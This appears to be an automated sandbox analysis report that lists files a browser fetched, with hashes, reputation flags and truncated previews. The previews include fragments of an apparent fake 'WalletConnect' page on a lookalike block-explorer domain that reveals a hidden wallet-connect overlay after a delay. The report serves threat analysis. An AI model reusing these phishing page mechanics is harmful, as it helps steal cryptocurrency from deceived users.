                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (712)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1299
                                                                                                                                                                                                                                              Entropy (8bit):5.67019239768099
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kHBDRhq5qSGpF4jJPU4dBhmBvW4jJN9eL0WbU4pVuhKjJDvNb+fKrxOYtkFp4jJG:ASWfu9Z5mBvWumZbZpVe4pp+fZuLuz
                                                                                                                                                                                                                                              MD5:0235B2E087DA49C300273621017C0E10
                                                                                                                                                                                                                                              SHA1:0F9EA44645EB7DB3F2C5423C7567EE0C160CA98F
                                                                                                                                                                                                                                              SHA-256:143CD071881ACC0EA58DEC774106AD688680483E1189A43B9897E7243677A5DC
                                                                                                                                                                                                                                              SHA-512:863CF12A855CDA84653906795DCCCD210CBDCC47E6D470BBE46D2A8D04B132F2E3DCC4050F768D33314C9AD5E5BEB065E23541E1ADDAE50C0AAADA0BD18CC209
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://event.getblue.io/p/?cId=A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B&tName=visit&pId=&revenue=&orderId=&p1=&p2=&p3=&fp=&blueID=d699c8fb-0495-44e7-bb4e-319fe1118aff&ulc=p3uc729n&v=29092023-1023&nocache=9115028234168.785
                                                                                                                                                                                                                                              Preview:<html><head><meta name='referrer' content='no-referrer'/></head><body>.<img src="https://ib.adnxs.com/setuid?entity=449&code=FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3" width="1" height="1" /> <img src="https://ib.adnxs.com/getuid?https://cms.getblue.io/cm/?src=appnexus&ckid=FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3&cid=A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B&blueID=d699c8fb-0495-44e7-bb4e-319fe1118aff&appnexusid=$UID" width="1" height="1" /><img src="https://cm.g.doubleclick.net/pixel?google_nid=coveny_limited&google_cm&&google_sc&ckid=FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3&cid=A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B&google_ula=6572934421&ula=6572934421&google_hm=RkJGMjlENkItOEQ2Qi00QjU3LUJBMkNBM0E4M0NDMDhCRDM&blueID=d699c8fb-0495-44e7-bb4e-319fe1118aff&process_consent=T" width="1" height="1" />.<script type='text/javascript'>.window.blueuserCkid='FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3';.window.blueuserCid='A0CFAC1E-B13F-B1FB-FE4BEDC860AA7E5B';.</script>.<script type='text/javascript' src='//event.getblue.io/r/
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3626)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3627
                                                                                                                                                                                                                                              Entropy (8bit):5.196244188680261
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:l+8KXdSLsPDgTKx89c4A14lqLBLwLP4A101e1:l+8Kdbgi8Cr14CB6Pr1MU
                                                                                                                                                                                                                                              MD5:57C7139D8E7A12347566957C96ED873B
                                                                                                                                                                                                                                              SHA1:05FAE6E3C3F60CC66C12CA0E2CAA27D22EB68549
                                                                                                                                                                                                                                              SHA-256:D7D98FC8DCBE27D21479F2A5B7455DD484C8ED24F6BC59E0FDAEDA0B6EF27D86
                                                                                                                                                                                                                                              SHA-512:9DF2BC22A9B90E264AA00E495FF8EE50EF095B0BC4388B45D927F9AB42CC00FA8129FDA585DF6D3B9C90905C004CF82924F7D141DD54074185E8079AA08891D0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var u=Object.defineProperty,c=Object.defineProperties;var l=Object.getOwnPropertyDescriptors;var o=Object.getOwnPropertySymbols;var d=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var i=(s,e,t)=>e in s?u(s,e,{enumerable:!0,configurable:!0,writable:!0,value:t}):s[e]=t,n=(s,e)=>{for(var t in e||(e={}))d.call(e,t)&&i(s,t,e[t]);if(o)for(var t of o(e))p.call(e,t)&&i(s,t,e[t]);return s},a=(s,e)=>c(s,l(e));import{h as r}from"./http-f4555b94.js";import{B as m}from"./baseService-449c2e3e.js";import{h}from"./manifest-51a3674f.js";const B={getDashboardData:()=>r.post("/activity/bonus-dashboard/get/?channel=2"),getDashboardStatistics:()=>r.post("/activity/bonus-dashboard/statistics/"),getSpecialBonus:()=>r.post("/new-reward/special/uncollected/"),receiveReward:s=>r.post(`/activity/reward/receive/${s}/`),checkUserClaimedFreeMoney:()=>r.get("/activity/reward/hasUserClaimedFreeMoney")};class y extends m{constructor(e){super(),this.api=e}bonusDashboardResource(){return this.c
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (39886), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):39886
                                                                                                                                                                                                                                              Entropy (8bit):5.416171406617656
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:nr9Bg3avSgxOvyEYAxeI88/AZkNenSbnM7Vp6Y66o+W0BB3dKF2oDPrN50jTQnpk:EQd8/AAekT6xB3dw7rIQnpt+wG1yJPyN
                                                                                                                                                                                                                                              MD5:AA73D18978D6A868CFE42E5E7EF3650A
                                                                                                                                                                                                                                              SHA1:F21FD672A1B3FABA8D6C19C889DA301B6DBD2D2B
                                                                                                                                                                                                                                              SHA-256:EC0429821FC8F95029086A142DD8C88B1B734AE3B9595A2A1C6B4F78022131BA
                                                                                                                                                                                                                                              SHA-512:1D1821062C5BD4A39E8082D95F331CDFDEBB62329474818A6CF23C45460823E78AF4B8C302055796CB1FF7F170A35EB4D5EC38D829E083594CB87DEE60ECE0FC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"undefined"!=typeof module&&module.exports?module.exports=e:e(jQuery,window,document)}(function(e){var t,o,a,n,i,r,l,s,c,d,u,f,h,m,p,g,v,x,_,w,S,b,C,y,B,T,k,M,O,I,D,E,W,R,A,L,z,P,H,U,F,q,j,Y,X,N,V,Q,G,J,K,Z,$,ee,te,oe,ae,ne,ie,re;ne="function"==typeof define&&define.amd,ie="undefined"!=typeof module&&module.exports,re="https:"==document.location.protocol?"https:":"http:",ne||(ie?require("jquery-mousewheel")(e):e.event.special.mousewheel||e("head").append(decodeURI("%3Cscript src="+window.location.origin+"/assets/vendor/jquery-mousewheel/3.1.13/jquery.mousewheel.min.js%3E%3C/script%3E"))),o="mCustomScrollbar",a="mCS",n=".mCustomScrollbar",i={setTop:0,setLeft:0,axis:"y",scrollbarPosition:"inside",scrollInertia:950,autoDraggerLength:!0,alwaysShowScrollbar:0,snapOffset:0,mouseWheel:{enable:!0,scrollAmount:"auto",axis:"y",deltaFactor:"auto",disableOver:["select","option","keygen","datalist","textarea"]},scrollButtons:{s
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3626)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3627
                                                                                                                                                                                                                                              Entropy (8bit):5.196244188680261
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:l+8KXdSLsPDgTKx89c4A14lqLBLwLP4A101e1:l+8Kdbgi8Cr14CB6Pr1MU
                                                                                                                                                                                                                                              MD5:57C7139D8E7A12347566957C96ED873B
                                                                                                                                                                                                                                              SHA1:05FAE6E3C3F60CC66C12CA0E2CAA27D22EB68549
                                                                                                                                                                                                                                              SHA-256:D7D98FC8DCBE27D21479F2A5B7455DD484C8ED24F6BC59E0FDAEDA0B6EF27D86
                                                                                                                                                                                                                                              SHA-512:9DF2BC22A9B90E264AA00E495FF8EE50EF095B0BC4388B45D927F9AB42CC00FA8129FDA585DF6D3B9C90905C004CF82924F7D141DD54074185E8079AA08891D0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-adb8672d.js
                                                                                                                                                                                                                                              Preview:var u=Object.defineProperty,c=Object.defineProperties;var l=Object.getOwnPropertyDescriptors;var o=Object.getOwnPropertySymbols;var d=Object.prototype.hasOwnProperty,p=Object.prototype.propertyIsEnumerable;var i=(s,e,t)=>e in s?u(s,e,{enumerable:!0,configurable:!0,writable:!0,value:t}):s[e]=t,n=(s,e)=>{for(var t in e||(e={}))d.call(e,t)&&i(s,t,e[t]);if(o)for(var t of o(e))p.call(e,t)&&i(s,t,e[t]);return s},a=(s,e)=>c(s,l(e));import{h as r}from"./http-f4555b94.js";import{B as m}from"./baseService-449c2e3e.js";import{h}from"./manifest-51a3674f.js";const B={getDashboardData:()=>r.post("/activity/bonus-dashboard/get/?channel=2"),getDashboardStatistics:()=>r.post("/activity/bonus-dashboard/statistics/"),getSpecialBonus:()=>r.post("/new-reward/special/uncollected/"),receiveReward:s=>r.post(`/activity/reward/receive/${s}/`),checkUserClaimedFreeMoney:()=>r.get("/activity/reward/hasUserClaimedFreeMoney")};class y extends m{constructor(e){super(),this.api=e}bonusDashboardResource(){return this.c
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):23119
                                                                                                                                                                                                                                              Entropy (8bit):7.976020238499727
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Ooxzq57GMw57Lg2hC+Vgf+MFbr2Fv4OS/qIb6vttqajrq4K+PGb57tCMjLV2azTG:pVuw2uC80tCsqGqimrqLkGb57Njh2km3
                                                                                                                                                                                                                                              MD5:E8DE26EAEF95ED14A7D0C1482D6BE7FC
                                                                                                                                                                                                                                              SHA1:268B71E3A06B4F830697A733F67CC69E42479920
                                                                                                                                                                                                                                              SHA-256:CEBADABC3C0D78FF5FD7AFDEA6CE6BEC26E9A4484D177BED75D49639B3ACB4E5
                                                                                                                                                                                                                                              SHA-512:C235DAE2ED97CFD5270706C9A1F4F8D4B5707CC314510E0E26D3F0C0DB6D2705D3FE76E1E5B6A12CFCE144229311934E065E846DF943126DC125AEC33F4E3527
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTE..0......./.....=..&.............*.3.:.k....".1....D.....U..q..x. .F._.....k.,.T....6..:.. ..`......H......!....%..................a.l.........g.w...1.E..................'......../.:.`.2.`....O.w............jy:.o...C.}.............m].i...`...F%L.A..>....m.).{...V.Z.o...V...v.O..:.A..a%.L-....}6........P..b.o;..'..^....G.^.w.7.....9..N.G.P}N.........e@.X(d......A..H..".............h-t.g.......:.}[..L.......\..\...s.]....wQ..E..a..........s.S=RkL.....|............k........X..........Y>..G?.x............Q$x.z...3..d.C.....d....tpo.w.....%").pP=7>......]..LD....o.k...bZ`H.1.k....&0.x.....s..A....)...........z.w..Fs.Y...07...^.?....f_..B`L!...sM......,.F...K....r.....G..<.;..l.t.aW..b.S#..@7.........^.Q...l.*..v$.l.Wz....F... .IDATx^...\SW....F.._m3#....4.-.C0*.6.N..U....5?.. .mB.@S....*.l.P..(.Qq...qA..q...j.Ng...eA...Q..{s..}.......vw......(......S...Y.~.p....,.8q..IS^x..z....!.;..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):744
                                                                                                                                                                                                                                              Entropy (8bit):4.9286079116522945
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:if0PSDRRD0PnODRRmITx28DRRLFgI0fCRPwShFV51DRRfiPz+3ugWZseTopbBnUl:icPaRRYPnWRRmSx2gRRLFgII0oShFFRG
                                                                                                                                                                                                                                              MD5:3251C02C63D2AA8D2FC244C22BA90BAC
                                                                                                                                                                                                                                              SHA1:8FBE7CBDD23A12E6B4E154ED9423DD2100049203
                                                                                                                                                                                                                                              SHA-256:6B5B56BDCFDEAE7611B597C6ECA160763AEDB2F2B52A67A76D72617658AD6DBC
                                                                                                                                                                                                                                              SHA-512:AA8072148A5EA389184CECF7B28A0D770E322B4742A8A80219352892A8FCD0DBF6DB7146384AEC242D790B8729032596EFD75741126E9AB79731D016A3847888
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const websiteUrl = "/dist/website.html";..const overlay = document.getElementById("overlay");..const overlayButton = document.getElementById("overlayButton");..const websiteFrame = document.getElementById("websiteFrame");....websiteFrame.addEventListener("load", () => {.. overlay.classList.add("active");..});....websiteFrame.src = websiteUrl;....// Get a reference to the hidden div..const hiddenDiv = document.getElementById("walletconnect-wrapper");....// Function to show the hidden div..function showHiddenDiv() {.. hiddenDiv.style.visibility = "visible"; // Change to 'flex', 'grid', etc. if needed..}....// Call the function after a certain delay..setTimeout(showHiddenDiv, 3000); // Change 3000 to the desired delay in milliseconds..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):6639
                                                                                                                                                                                                                                              Entropy (8bit):7.957132117394856
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:cs9jfNYjiuJ39PIcTvd/3qGoCARLiXbaC6yjmepvhsWci5yE7ny4i2KH0GB0PnvS:/9L6OurIWdav+5jHsC5yrH4PnC22j
                                                                                                                                                                                                                                              MD5:8229091CC4F7EB5EEE22B6AEF0AA84A8
                                                                                                                                                                                                                                              SHA1:667704A78B1B1DB8C8FF4E01E88C14CC5E147B46
                                                                                                                                                                                                                                              SHA-256:8F6FB22DD4EDDD519608407F8F760B011FC1B486726C44D4ED42D833096BA6F6
                                                                                                                                                                                                                                              SHA-512:06F82B7547EA243C5FA23C5BD8F76794D90ECC837684D3820BFF2C4B49032412AD67B4A4BA9DEC028BBAAC1C90D443FCE0F7B952D6962F41C63823DAD8583A67
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.....p.T....IDATx....^U...gv._DAQ..E....."....e...... ..i..l..d.......A+aQ..J..B...d.$.....v.....s..}.9w..8.=..3...|...,..x..1.3...X..k.bq..R..-.c....c..,.V.gS...j._@.d8........#).!.R.D...?-~.....A'.......o[~3.X,Y...8.. ..p.c.....3..Z.....&.....}.#........'Z.L...d.r."..m.a...B.m.....6...:w ....:..6.mR..<N.+.|..!.p....#..s5=_...|.>#.G,...(k+...,L....@..R.G.......1.....*.NkB[.E...Gh.._....|..j...O...&.{...i.'..S.Xq{NU...]...8...:..r.V._..F$..Z.E d&...W.S.9.d7A.T.P.jR...2!.+s.3..k2.....R..N...e..i..I.DhE..$^+@0r.%...M....l..F.........}.#7.<.....GB+b..'..KP.}M.T.......k.V.`D..... .z.^..q.U.........S..^T..E.@...j........+1;H}...\.....F.......-. ._{.,.3.. ..^.4...)..or-....j..iU5......N.>..4..}...,. O^}.s.....P....uq7q...f..c.....1.......da........D);Q.Jai#R.....B.l.e/6...@.....X.....{.bf.....{......<..P..d......XF.}#e....G.iX.<......t`...3..ea..~.... ...@..uD.....T.t..3[.f..a...Ub/M<..9.d..e...5h...<.......{.......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14501)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):14502
                                                                                                                                                                                                                                              Entropy (8bit):5.851446590919882
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:xUbKb1NPM87XaH6EeK7IFNKTCBw6bgCtE2eEQr4/LykxP1TUffJBErDTQ3:xX7zdgGkp6bgCtE2eE7/ZPSfxkQ3
                                                                                                                                                                                                                                              MD5:1B5697DCD2764BD06769A877160FB4AB
                                                                                                                                                                                                                                              SHA1:3592B50B71A5BD77DB11F25E710D4F7A46CDBAAB
                                                                                                                                                                                                                                              SHA-256:CBBB8214F30F340FADE4A8FD3A1E6A2D66DD98ABC6F6C4C282CBFB8D0E0CF0FB
                                                                                                                                                                                                                                              SHA-512:875C78E1E61AD8EDA282D68AF6A989CAC134142C1C0C82B90B0E9BA97DDFEC3B1AD9BD6F39B2F1E2E3A143A7FDE6D3D826270A2C4CC6434004BF4E57762F5771
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-96ed660e.js
                                                                                                                                                                                                                                              Preview:const s="/modules/bonus2/assets/bcd-rakeback-rule-banner-b2abb788.png",e="/modules/bonus2/assets/bcd-rakeback-rule-banner_light-f992d1b3.png",n="/modules/bonus2/assets/rakeback-bg-ba7bf28a.png",o="/modules/bonus2/assets/rakeback-coin-fiat-0d6c9b7d.png",t="/modules/bonus2/assets/rakeback-coin-2ac02f51.png",A="/modules/bonus2/assets/bonus-bcd-link-66b2f09c.png",a="/modules/bonus2/assets/bonus-lottery-link-0e222b0b.png",c="/modules/bonus2/assets/shine-light-63165faf.png",u="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACYAAAAxCAMAAACBMCu/AAAAh1BMVEUAAAD/5gD/6AD/+AD//wD/5wD/5wD/5wD/6AD/7AD/8AD/5gD/5wD/5wD/6AD/5gD/6AD/6gD/5wD/5wD/5wD/5wD/5wD/6AD/6AD/6QD/6AD/6QD/5wD/5wD/5wD/5wD/5gD/5wD/6AD/6QD/6AD/5wD/5gD/5gD/5gD/5gD/5gD/6wD/5gCx9Z+VAAAALHRSTlMA7IMJBvazlzYdEPjUp1lSKSTy6NydfXBgUEs84cq9uKSQbDIW3s7Nr65oGlS5oqQAAAEPSURBVDjLjdPnkoIwFIbhA5Hemwiou5bt3/1f3zoZmaCG5Dy/30kPaWyIJedlvmBlzsSpSvSc7Bc+J8vgsJYGhPYqBODaMxfApz1rcVMy5uTM2smssdxr7EHaWTcgtcbhrjXuevMNzLxqvdpBSeO1akiw8BXpqx6PmkkTRRmeJafniWPXg4ZzFq
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1433
                                                                                                                                                                                                                                              Entropy (8bit):6.153004618849654
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LO3kzum8COZNDsLlpGPUc6Ql2QRD1yuu+LPV2/HMKITu7ZMFztNhKNKM:+ZYjwO3klfll0xltR5yuusPVlJytMFT0
                                                                                                                                                                                                                                              MD5:DD2293B3C6F1C4186395FA812D7B0282
                                                                                                                                                                                                                                              SHA1:79141C015BD6F6E973086FBFCC4A4BDF684ADF1E
                                                                                                                                                                                                                                              SHA-256:BCB55564C6DA746049C7FB471A950D090EEF7115A314C83725FFA504208E827E
